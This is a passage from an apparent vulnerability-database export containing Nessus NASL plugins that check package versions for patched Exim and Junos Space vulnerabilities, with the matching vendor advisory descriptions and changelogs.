value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"exim4\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-base\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-config\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dbg\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dev\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"eximon4\", reference:\"4.80-7+deb7u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-base\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-config\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dbg\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dev\", reference:\"4.84.2-1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"eximon4\", reference:\"4.84.2-1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:36:05", "description": "This update to exim 4.86.2 fixes the following issues :\n\n - CVE-2016-1531: local privilege escalation for set-uid root exim when using 'perl_startup' (boo#968844)\n\nImportant: Exim now cleans the complete execution environment by default. This affects Exim and subprocesses such as transports calling other programs. The following new options are supported to adjust this behaviour :\n\n - keep_environment\n\n - add_environment A warning will be printed upon startup if none of these are configured.\n\nAlso includes upstream changes, improvements and bug fixes :\n\n - Support for using the system standard CA bundle.\n\n - New expansion items $config_file, $config_dir, containing the file and directory name of the main configuration file. Also $exim_version.\n\n - New 'malware=' support for Avast.\n\n - New 'spam=' variant option for Rspamd.\n\n - Assorted options on malware= and spam= scanners.\n\n - A commandline option to write a comment into the logfile.\n\n - A logging option for slow DNS lookups.\n\n - New $(env (<variable>)) expansion.\n\n - A non-SMTP authenticator using information from TLS client certificates.\n\n - Main option 'tls_eccurve' for selecting an Elliptic Curve for TLS.\n\n - Main option 'dns_trust_aa' for trusting your local nameserver at the same level as DNSSEC.", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2016-326)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-326.NASL", "href": "https://www.tenable.com/plugins/nessus/89909", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-326.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89909);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1531\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2016-326)\");\n script_summary(english:\"Check for the openSUSE-2016-326 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to exim 4.86.2 fixes the following issues :\n\n - CVE-2016-1531: local privilege escalation for set-uid\n root exim when using 'perl_startup' (boo#968844)\n\nImportant: Exim now cleans the complete execution environment by\ndefault. This affects Exim and subprocesses such as transports calling\nother programs. The following new options are supported to adjust this\nbehaviour :\n\n - keep_environment\n\n - add_environment A warning will be printed upon startup\n if none of these are configured.\n\nAlso includes upstream changes, improvements and bug fixes :\n\n - Support for using the system standard CA bundle.\n\n - New expansion items $config_file, $config_dir,\n containing the file and directory name of the main\n configuration file. Also $exim_version.\n\n - New 'malware=' support for Avast.\n\n - New 'spam=' variant option for Rspamd.\n\n - Assorted options on malware= and spam= scanners.\n\n - A commandline option to write a comment into the\n logfile.\n\n - A logging option for slow DNS lookups.\n\n - New $(env (<variable>)) expansion.\n\n - A non-SMTP authenticator using information from TLS\n client certificates.\n\n - Main option 'tls_eccurve' for selecting an Elliptic\n Curve for TLS.\n\n - Main option 'dns_trust_aa' for trusting your local\n nameserver at the same level as DNSSEC.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968844\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"exim-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"exim-debuginfo-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"exim-debugsource-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"eximon-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"eximon-debuginfo-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"eximstats-html-4.86.2-3.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"exim-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"exim-debuginfo-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"exim-debugsource-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"eximon-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"eximon-debuginfo-4.86.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"eximstats-html-4.86.2-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:36:13", "description": "It was discovered that Exim incorrectly filtered environment variables when used with the perl_startup configuration option. If the perl_startup option was enabled, a local attacker could use this issue to escalate their privileges to the root user. This issue has been fixed by having Exim clean the complete execution environment by default on startup, including any subprocesses such as transports that call other programs. This change in behaviour may break existing installations and can be adjusted by using two new configuration options, keep_environment and add_environment. (CVE-2016-1531)\n\nPatrick William discovered that Exim incorrectly expanded mathematical comparisons twice. A local attacker could possibly use this issue to perform arbitrary file operations as the Exim user. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-2972).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-16T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : Exim vulnerabilities (USN-2933-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2972", "CVE-2016-1531"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "p-cpe:/a:canonical:ubuntu_linux:exim4-dev", "p-cpe:/a:canonical:ubuntu_linux:eximon4", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4", "p-cpe:/a:canonical:ubuntu_linux:exim4-base", "p-cpe:/a:canonical:ubuntu_linux:exim4-config"], "id": "UBUNTU_USN-2933-1.NASL", "href": "https://www.tenable.com/plugins/nessus/89962", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2933-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89962);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2014-2972\", \"CVE-2016-1531\");\n script_xref(name:\"USN\", value:\"2933-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : Exim vulnerabilities (USN-2933-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was discovered that Exim incorrectly filtered environment variables\nwhen used with the perl_startup configuration option. If the\nperl_startup option was enabled, a local attacker could use this issue\nto escalate their privileges to the root user. This issue has been\nfixed by having Exim clean the complete execution environment by\ndefault on startup, including any subprocesses such as transports that\ncall other programs. This change in behaviour may break existing\ninstallations and can be adjusted by using two new configuration\noptions, keep_environment and add_environment. (CVE-2016-1531)\n\nPatrick William discovered that Exim incorrectly expanded mathematical\ncomparisons twice. A local attacker could possibly use this issue to\nperform arbitrary file operations as the Exim user. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-2972).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-2933-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1531\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim \"perl_startup\" Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'exim4', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-base', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-config', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'exim4-dev', 'pkgver': '4.82-3ubuntu2.1'},\n {'osver': '14.04', 'pkgname': 'eximon4', 'pkgver': '4.82-3ubuntu2.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:02:30", "description": "According to its self-reported version number, the version of Junos Space running on the remote device is < 17.1R1, and is therefore affected by multiple vulnerabilities.", "cvss3": {}, "published": "2017-10-23T00:00:00", "type": "nessus", "title": "Juniper Junos Space < 17.1R1 Multiple Vulnerabilities (JSA10826)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1547", "CVE-2016-1548", "CVE-2016-1549", "CVE-2016-1550", "CVE-2016-1551", "CVE-2016-2516", "CVE-2016-2517", "CVE-2016-2518", "CVE-2016-2519", "CVE-2017-1000364", "CVE-2017-1000365", "CVE-2017-1000366", "CVE-2017-1000367", "CVE-2017-1000369", "CVE-2017-1000371", "CVE-2017-1000379", "CVE-2017-10612", "CVE-2017-10623", "CVE-2017-10624", "CVE-2017-7494"], "modified": "2023-03-30T00:00:00", "cpe": ["cpe:/a:juniper:junos_space"], "id": "JUNIPER_SPACE_JSA_10826.NASL", "href": "https://www.tenable.com/plugins/nessus/104100", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104100);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/30\");\n\n script_cve_id(\n \"CVE-2017-10612\",\n \"CVE-2017-10623\",\n \"CVE-2017-10624\",\n \"CVE-2017-7494\",\n \"CVE-2017-1000365\",\n \"CVE-2017-1000366\",\n \"CVE-2017-1000371\",\n \"CVE-2017-1000379\",\n \"CVE-2016-2516\",\n \"CVE-2017-1000367\",\n \"CVE-2016-1548\",\n \"CVE-2017-1000364\",\n \"CVE-2016-1547\",\n \"CVE-2016-1550\",\n \"CVE-2016-2518\",\n \"CVE-2016-2517\",\n \"CVE-2016-2519\",\n \"CVE-2016-1549\",\n \"CVE-2016-1551\",\n \"CVE-2017-1000369\"\n );\n script_bugtraq_id(101255, 101256);\n script_xref(name:\"JSA\", value:\"JSA10826\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/04/20\");\n\n script_name(english:\"Juniper Junos Space < 17.1R1 Multiple Vulnerabilities (JSA10826)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Junos\nSpace running on the remote device is < 17.1R1, and is therefore\naffected by multiple vulnerabilities.\");\n # https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10826&actp=METADATA\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d563772\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Junos Space version 17.1R1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Junos_Space/version\");\n\n exit(0);\n}\n\ninclude(\"junos.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('Host/Junos_Space/version');\n\ncheck_junos_space(ver:ver, fix:'17.1R1', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:28:10", "description": "This update for exim fixes the following issues :\n\nExim was updated to exim-4.94.2\n\nsecurity update (boo#1185631)\n\n - CVE-2020-28007: Link attack in Exim's log directory\n\n - CVE-2020-28008: Assorted attacks in Exim's spool directory\n\n - CVE-2020-28014: Arbitrary PID file creation\n\n - CVE-2020-28011: Heap buffer overflow in queue_run()\n\n - CVE-2020-28010: Heap out-of-bounds write in main()\n\n - CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n\n - CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n\n - CVE-2020-28015: New-line injection into spool header file (local)\n\n - CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n\n - CVE-2020-28009: Integer overflow in get_stdinput()\n\n - CVE-2020-28017: Integer overflow in receive_add_recipient()\n\n - CVE-2020-28020: Integer overflow in receive_msg()\n\n - CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n\n - CVE-2020-28021: New-line injection into spool header file (remote)\n\n - CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n\n - CVE-2020-28026: Line truncation and injection in spool_read_header()\n\n - CVE-2020-28019: Failure to reset function pointer after BDAT error\n\n - CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n\n - CVE-2020-28018: Use-after-free in tls-openssl.c\n\n - CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\nupdate to exim-4.94.1\n\n - Fix security issue in BDAT state confusion. Ensure we reset known-good where we know we need to not be reading BDAT data, as a general case fix, and move the places where we switch to BDAT mode until after various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n\n - Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n\n - Fix security issue with too many recipients on a message (to remove a known security problem if someone does set recipients_max to unlimited, or if local additions add to the recipient list). Fixes CVE-2020-RCPTL reported by Qualys.\n\n - Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in parse_fix_phrase()\n\n - Fix security issue CVE-2020-PFPSN and guard against cmdline invoker providing a particularly obnoxious sender full name.\n\n - Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n\n - Bug 1329: Fix format of Maildir-format filenames to match other mail- related applications. Previously an 'H' was used where available info says that 'M' should be, so change to match.\n\n - Bug 2587: Fix pam expansion condition. Tainted values are commonly used as arguments, so an implementation trying to copy these into a local buffer was taking a taint-enforcement trap. Fix by using dynamically created buffers.\n\n - Bug 2586: Fix listcount expansion operator. Using tainted arguments is reasonable, eg. to count headers.\n Fix by using dynamically created buffers rather than a local. Do similar fixes for ACL actions 'dcc', 'log_reject_target', 'malware' and 'spam'; the arguments are expanded so could be handling tainted values.\n\n - Bug 2590: Fix -bi (newaliases). A previous code rearrangement had broken the (no-op) support for this sendmail command. Restore it to doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n\n - some transports now refuse to use tainted data in constructing their delivery location this WILL BREAK configurations which are not updated accordingly. In particular: any Transport use of $local_user which has been relying upon check_local_user far away in the Router to make it safe, should be updated to replace $local_user with $local_part_data.\n\n - Attempting to remove, in router or transport, a header name that ends with an asterisk (which is a standards-legal name) will now result in all headers named starting with the string before the asterisk being removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n\n - bring changes from current in +fixes branch (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee 94)\n\n - fixes CVE-2020-12783 (boo#1171490)\n\n - Regard command-line recipients as tainted.\n\n - Bug 2489: Fix crash in the 'pam' expansion condition.\n\n - Use tainted buffers for the transport smtp context.\n\n - Bug 2493: Harden ARC verify against Outlook, which has been seen to mix the ordering of its ARC headers. This caused a crash.\n\n - Bug 2492: Use tainted memory for retry record when needed. Previously when a new record was being constructed with information from the peer, a trap was taken.\n\n - Bug 2494: Unset the default for dmarc_tld_file.\n\n - Fix an uninitialised flag in early-pipelining.\n Previously connections could, depending on the platform, hang at the STARTTLS response.\n\n - Bug 2498: Reset a counter used for ARC verify before handling another message on a connection. Previously if one message had ARC headers and the following one did not, a crash could result when adding an Authentication-Results: header.\n\n - Bug 2500: Rewind some of the common-coding in string handling between the Exim main code and Exim-related utities.\n\n - Fix the variables set by the gsasl authenticator.\n\n - Bug 2507: Modules: on handling a dynamic-module (lookups) open failure, only retrieve the errormessage once.\n\n - Bug 2501: Fix init call in the heimdal authenticator.\n Previously it adjusted the size of a 